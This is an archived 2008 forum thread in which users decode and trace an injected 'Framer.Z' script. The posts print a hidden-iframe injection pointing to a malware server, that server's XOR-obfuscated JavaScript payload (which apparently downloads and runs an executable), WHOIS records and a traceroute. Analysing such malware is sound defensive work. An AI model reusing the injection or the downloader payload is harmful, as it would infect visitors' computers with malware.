msg deleted - dslreports.com

Author	All Replies
foxsteve Premium join:2001-12-28 Campbell, CA 4 edits	Re: Question about HTML/Framer.Z That sequence (%77%69%6e%64%6f%77%2e...) may be decoded as here *window.status='Done';document.write('<iframe name=a0a5a src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()43280)+'8b6\' width=541 height=80 style=\'display: none\'></iframe>') Only one website was found with this IP 58.65.232.33, however this website was not related to any domain name. Additional information.** This IP is allocated to APNIC (Asia Pacific Network Information Centre) Address: PO Box 2131 City: Milton StateProv: QLD PostalCode: 4064 Country: AU inetnum: 58.65.232.0 - 58.65.239.255 netname: HOSTFRESH descr: Internet Service Provider status: ALLOCATED PORTABLE person: Piu Lo nic-hdl: PL466-AP e-mail: ipadmin@hostfresh.com address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong phone: +852-35979788 fax-no: +852-24522539 country: HK WEB site is active and here is a result of calling that URL http://58.65.232.33/gpack/index.php Requesting http://58.65.232.33/gpack/index.php .. Ok Reply received (reply time: 484 ms) ----------------------------------- HTTP/1.1 200 OK Date: Sat, 05 Apr 2008 22:36:58 GMT Server: Apache/2.2.6 (Fedora) X-Powered-By: PHP/5.1.6 Content-Length: 942 Connection: close Content-Type: text/html <html><head><meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404"><script language=JavaScript>str = "ru`su)(:gtobuhno!ru`su)(!zw`s!fgg!<!enbtldou/bsd`udDmdldou)&nckdbu&(:fgg/rdu@uushctud)&he&-&fgg&(:fgg/rdu@uushctud)&bm`rrhe&-&bm&&rh&#e;CE##87B4#&47,74@2,0&#0E1,89#&2@,11&#B15#&GB3&#8D#&27&(:usx!zw`s!p!<!fgg/Bsd`udNckdbu)&lr&#yl#&m3&#/#&YL&#MI#&U&&UQ&-&&(:w`s!r!<!fgg/Bsd`udNckdbu)#Ridm##m/@q##qm##hb`uh##no#-&&(:w`s!u!<!fgg/Bsd`udNckdbu)&`e&&ne&#c/#&ru&#sd#&`l&-&&(:usx!z!u/uxqd!<!0:p/nqdo)&F&#D#&U&-&iuuq;..49/74/323/22.fq`bj.mn`e/qiq&-g`mrd(:p/rdoe)(:!u/nqdo)(:u/Vshud)p/sdrqnordCnex(:w`s!o`ld!<!&/..//..hdyqmnsds/dyd&:u/R`wdUnGhmd)o`ld-3(:u/Bmnrd)(:\|!b`ubi)d(!z\|usx!z!r/ridmmdydbtud)o`ld(:!\|!b`ubi)d(!z\|\|b`ubi)d(z\|\|";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></head></html> PS. For *bobince* As you see that server is located in Hong-Kong and it is not Russia. :)
foxsteve Premium join:2001-12-28 Campbell, CA 4 edits	to forum · permalink · · 2008-04-05 18:21:28 ·
bobince join:2002-04-19 DE	quote: As you see that server is located in Hong-Kong and it is not Russia True, that's where it's hosted, but the operators of the server are almost certainly members of Russian-language malware community and not residents of HK. HostFresh is a black-hat provider of dedicated servers catering primarily to the Russians. It was previously housed alongside another major black-hat ISP, Esthost, in the Atrivo/Intercage Netblock of Hell.
bobince join:2002-04-19 DE	to forum · permalink · · 2008-04-06 11:35:18 ·
foxsteve Premium join:2001-12-28 Campbell, CA 1 edit	If this is information from Piu Lo nic-hdl: PL466-AP e-mail: ipadmin@hostfresh.com address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong phone: +852-35979788 fax-no: +852-24522539 .... >tracert 58.65.232.33 Tracing route to oracle.dmain.name [58.65.232.33] over a maximum of 30 hops: ............... 8 126 ms 127 ms 127 ms po12- 0.cr2.nrt1.asianetcom.net [202.147.50.146] 9 183 ms 185 ms 183 ms gi6-2.cr1.hkg3.asianetcom.net [202.147.16.93] 10 190 ms 188 ms 190 ms po15-0.gw2.hkg3.asianetcom.net [202.147.16.210] 11 187 ms 186 ms 187 ms HFI-0002.gw2.hkg3.asianetcom.net [202.147.17.90] 12 187 ms 186 ms 187 ms 58.65.235.230 13 186 ms 187 ms 187 ms 116.50.12.10 14 182 ms 183 ms 184 ms oracle.dmain.name [58.65.232.33]
foxsteve Premium join:2001-12-28 Campbell, CA 1 edit	to forum · permalink · · 2008-04-06 13:08:09 ·


Friday, 04-Dec 10:46:12	Terms of Use \| Privacy Policy \| Hosting by www.nac.net - DSL,Hosting & Co-lo \| feedback \| contact over 10 years online! © 1999-2009 dslreports.com. page compression OFF